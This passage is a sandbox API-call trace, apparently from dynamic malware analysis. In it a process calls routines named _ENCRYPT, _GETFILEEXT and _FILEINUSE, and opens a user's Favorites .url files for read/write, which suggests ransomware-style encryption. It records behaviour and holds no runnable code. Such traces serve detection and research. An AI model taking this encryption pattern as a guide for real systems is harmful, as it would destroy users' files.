lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.160] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.160] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.160] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.161] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.162] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.162] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.162] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.162] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.162] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.162] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.162] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.162] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.162] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.162] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.162] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 0x7c20c0 [0037.163] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.163] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 0x7c20c0 [0037.163] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.163] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.163] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.163] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.163] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.163] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.163] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.163] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.163] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.163] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.163] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.164] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.165] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.165] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.165] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.165] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.165] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.165] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.165] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.165] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.165] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.165] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.165] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.165] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 0x7c20c0 [0037.166] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 0x7c20c0 [0037.166] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.166] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.167] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.167] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.167] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.167] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.167] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.167] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.168] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.168] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.168] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.168] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.168] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.168] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.168] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.168] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.168] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.168] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.169] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.169] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 0x7c20c0 [0037.169] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 0x7c20c0 [0037.170] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.170] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.170] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.170] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.170] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.170] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.170] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.170] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.170] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.170] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.171] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.171] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.171] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.171] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.171] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.171] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.171] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.171] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.171] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.171] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.171] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.172] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.172] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.172] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.172] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.172] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.172] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN.url", cAlternateFileName="")) returned 0x7c20c0 [0037.172] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.172] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.172] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN.url", cAlternateFileName="")) returned 0x7c20c0 [0037.172] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.172] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.173] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.173] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.173] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.173] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.173] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.173] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.173] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.173] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.173] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.174] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.174] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.174] PeekMessageW (in: lpMsg=0x6aedfc, 